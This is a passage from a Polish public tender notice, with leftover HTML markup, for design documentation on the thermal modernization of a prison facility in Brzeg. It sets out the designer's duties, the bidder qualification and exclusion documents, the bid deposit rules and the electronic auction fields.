5.6 Opiniowanie przedstawionych przez wykonawcę robót lub zamawiającego, propozycji rozwiązań zamiennych lub ich przedstawianie w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub, gdy ich zastosowanie jest nieekonomiczne lub nieefektywne w świetle aktualnej wiedzy technicznej i zasad sztuki budowlanej, a koszt zastosowania nowych nie zwiększy kosztów zadania z zastrzeżeniem, że każde z rozwiązań musi być zaakceptowane przez zamawiającego.
5.7 Ocena parametrów lub wyników szczegółowych badań materiałów i konstrukcji w zakresie zgodności z rozwiązaniami projektowymi, normami i obowiązującymi przepisami.
5.8 Dokonaniu zmian rozwiązań projektowych  na żądanie zamawiającego.
5.9 Udział w naradach i komisjach technicznych, odbiorach robót zanikowych próbach instalacji i procedurach rozruchu oraz końcowym odbiorze zadania  na żądanie zamawiającego.
5.10 Poprawiania błędów projektowych, likwidacji kolizji między branżami lub uzupełnienia rysunków, detali bądź opisu technologii wykonania nie zawartych w dokumentacji autorskiej  bez prawa do odrębnego wynagrodzenia.
5.11 W przypadku wprowadzenia zmian stanowiących istotne odstępstwo od zatwierdzonego projektu i pozwolenia na budowę/roboty budowlane, wykonawca obowiązany jest własnym staraniem i na własny koszt doprowadzić do zgodności z obowiązującym prawem (sporządzenie projektu zamiennego, uzgodnienia, pozwolenie na budowę/roboty budowlane lub zgłoszenie remontowe).<br /><br /><b>II.5) Główny kod CPV: </b>71220000-6<br /><b> Dodatkowe kody CPV:</b>71320000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 67 ust. 1 pkt 6, ustawy Pzp w całym zakresie zamówienia podstawowego oraz w sytuacji zaistnienia konieczności powtórzenia prac będących przedmiotem niniejszego zamówienia.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 16/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 100 000,00 zł (słownie: sto tysięcy złotych 00/100) <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a/ Ocena spełnienia warunku dotyczącego zdolności technicznej i zawodowej zostanie dokonana na podstawie wykazu usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest wstanie uzyskać tych dokumentów  oświadczenie wykonawcy.

Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w ostatnich 3 latach przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie) wykonał co najmniej 2 projekty z zakresu budowy lub rozbudowy, albo kompleksowej modernizacji energetycznej obiektów użyteczności publicznej, a zakres obejmował co najmniej docieplenia, wymianę stolarki okiennej i drzwiowej oraz instalację centralnego ogrzewania  o wartości co najmniej 50 000,00 zł  brutto (pięćdziesiąt tysięcy złotych 00/100 brutto) każdy.
Przedmiotowy projekt powinien być wykonany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2013r. poz.1129) oraz Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 25 kwietnia 2012 r. (Dz.U. z 2012 r. poz. 462 z późn.zm.)

Wykaz, wraz podaniem przedmiotu usługi, jej wartości, daty i podmiotu na rzecz których usługi zostały wykonane, należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ.
Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskac tych dokumentów  oświadczenie wykonawcy.
W przypadku, gdy w dokumentach potwierdzajacych spełnienie warunków udziału w postępowaniu zostaną podane wartości podane w innych walutach niż złoty, będą one przeliczone wg kursów średnich walut obcych Narodowego Banku Polskiego, aktualnych na dzień zamieszczenia ogłoszenia o zamówieniu.

b/ Ocena spełnienia warunku dotyczącego zdolności technicznej i zawodowej zostanie dokonana na podstawie wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.

Warunek zostanie spełniony, jeżeli wykonawca dysponuje lub wykaże gotowość do dysponowania osobami zdolnymi do wykonania przedmiotu zamówienia, tj.:

Projektant architekt (1 osoba)  posiadający uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
Projektant konstruktor (1 osoba)   posiadający uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
Projektant branży sanitarnej (1 osoba)  posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
Projektant branży elektrycznej (1 osoba)  posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,

Zamawiający dopuszcza łączenie funkcji ww. projektantów, w przypadku gdy wskazana na określone stanowisko osoba posiada stosowne, wymagane przez zamawiającego kwalifikacje. 

Ilekroć zamawiający wymaga określonych uprawnień na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r.  Prawo budowlane (Dz.U. z 2016r. poz. 290), rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016r., poz. 65).

Celem potwierdzenia wymaganego warunku, wykonawcy muszą złożyć: 
 wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 7 do SIWZ,
 oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (zgodne z wzorem stanowiącym załącznik nr 8 do SIWZ).

Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w SIWZ dołączonych do ofert na zasadzie spełnia  nie spełnia.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zgodnie z wykazem osób  załącznik nr 7 do SIWZ</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
b) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 
d) oświadczenie dotyczące przesłanek wykluczenia z postępowania, na podstawie art.25a ust.1 ustawy Pzp, zgodnie z treścią załącznika nr 4a do SIWZ.
e) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23, zgodnie ze wzorem oświadczenia stanowiącego załącznik nr 5 do SIWZ. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ppkt a-c, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
aa) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
bb) nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
cc) dokumenty, o których mowa w ppkt. bb), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ppkt. aa), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów,o których mowa  powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, że wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis określony w ppkt. cc) stosuję się.
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)  wykazu usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest wstanie uzyskać tych dokumentów  oświadczenie wykonawcy (zgodnie z rozdziałem V, pkt. 2, ppkt. 2.3, lit.a SIWZ);
b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z rodziałem V, pkt.2 , ppkt. 2.3 lit.b SIWZ);
c) wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 100 000,00 zł (słownie: sto tysięcy złotych 00/100)  zgodnie z rozdziałem V, pkt.2, ppkt. 2.2 SIWZ)
d) oświadczenie dotyczące spełniania warunków udziału w postępowaniu, na podstawie art.25a ust.1 ustawy Pzp, zgodnie z treścią załącznika nr 4b do SIWZ
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />nie dotyczy</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a) wypełniony formularz ofertowy,  sporządzony zgodnie z treścią załącznika nr 3 do SIWZ;
b) informacja o części zamówienia, jaką wykonawca zamierza powierzyć podwykonawcy na formularzu oferty;
c) oświadczenia, o których mowa w SIWZ w rozdziale VII pkt. 1, ppkt. 1.1, 1.2, 1.3 oraz ppkt. 1.4 lit.a;
d) w przypadku powoływania się na zasoby podmiotów trzecich  pisemne zobowiązanie tych podmiotów w oryginale, o których mowa w SIWZ w rozdziale VII pkt. 1, ppkt. 1.5 - (zgodnie treścią załącznika nr 9 do SIWZ);
e) pełnomocnictwo (oryginał lub notarialnie potwierdzona kopia) w przypadku, gdy upoważnienie do podpisania oferty nie wynika z dokumentów rejestrowych. W przypadku podmiotów wspólnie ubiegających się o zamówienie pełnomocnictwo (oryginał lub notarialnie potwierdzona kopia) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
f) dowód wniesienia wadium, w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem;</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />
1.  Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert tj; do dnia 24.04.2017r. do godziny 10:00. Łączna wartość wadium wynosi 3 500,00 zł (słownie: trzy tysiące pięćset złotych 00/100)
2. Wykonawca wnosi wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Prawo zamówień publicznych tj.:
2.1) pieniądzu;
2.2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2.3) gwarancjach bankowych;
2.4) gwarancjach ubezpieczeniowych;
2.5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014r. poz.1804 oraz z 2015r. poz. 978 i 1240).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zakładu Karnego w Brzegu nr NBP O/Opole nr 35 1010 1401 0051 6413 9120 0000. Dowód wpłaty powinien posiadać dokładne oznaczenie tytułu wpłaty tj. wadium na opracowanie dokumentacji na termomodernizację . 
UWAGA! Wadium wniesione w pieniądzu (przelewem bankowym) musi być na koncie zamawiającego najpóźniej w dniu, w którym upływa termin składania ofert, czyli 24.04.2017r. i przed nadejściem godziny 10:00 do której oferty powinny być złożone.
Wykonawca zobowiązany będzie, do przedłożenia w swojej ofercie dowodu wniesienia wadium w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem.
4. Zgodnie z umową rachunku bankowego, wniesione wadium w formie pieniądza będzie przechowywane na nieoprocentowanym rachunku bankowym prowadzonym przez zamawiającego.
5. Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w oryginale w Kasie zamawiającego od poniedziałku do piątku w godzinach 7:30  15:30, przed upływem terminu składania ofert, a kopię zamieścić w ofercie.
6. Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, powinno wynikać bezwarunkowe, nieodwołalne, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz art. 46 ust. 5 ustawy Pzp
7. Treść gwarancji wadialnej musi zawierać następujące elementy:
7.1) nazwę dającego zlecenie (wykonawcy), nazwę beneficjenta gwarancji/poręczenia (zamawiającego), nazwę gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji/poręczenia) oraz wskazanie ich siedzib,
7.2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem  określenie przedmiotu zamówienia,
7.3) kwotę gwarancji/poręczenia,
7.4) termin ważności gwarancji/poręczenia,
7.5) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie zamawiającego zawierające oświadczenie, iż:
a) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzajacych okoliczności, o których mowa w art. 25 ust.1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust.1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszą, lub
b) wykonawca, którego ofertę wybrano:
 odmówił podpisania umowy w sprawie zamówienia publicznego w warunkach określonych w ofercie;
 nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
 zawarcie umowy w sprawie zamowienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Dopuszcza się zamiennie zapis odwołujący się do przypadków wskazanych w ustawie Pzp (art.46 ust. 4a i art.46 ust. 5 ustawy Pzp)
8. Zasady zwrotu wadium, zatrzymania  i ponownego wniesienia.
8.1) zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem art. 46 ust. 4a ustawy Pzp,
8.2) wykonawcy, którego oferta została wybrana najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano,
8.3) zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
8.4) zamawiajacy żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiajacego,
8.5) zamawiajacy zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art.25 ust. 1 ustawy Pzp, oświadczenia, o których mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej,
8.6) zamawiający również zatrzyma wadium, jeżeli wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie  umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy;
Oferta wykonawcy, który nie wniesie wymaganego wadium zostanie z mocy art. 89 ust. 1 pkt 7b ustawy Pzp, zostanie odrzucona.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
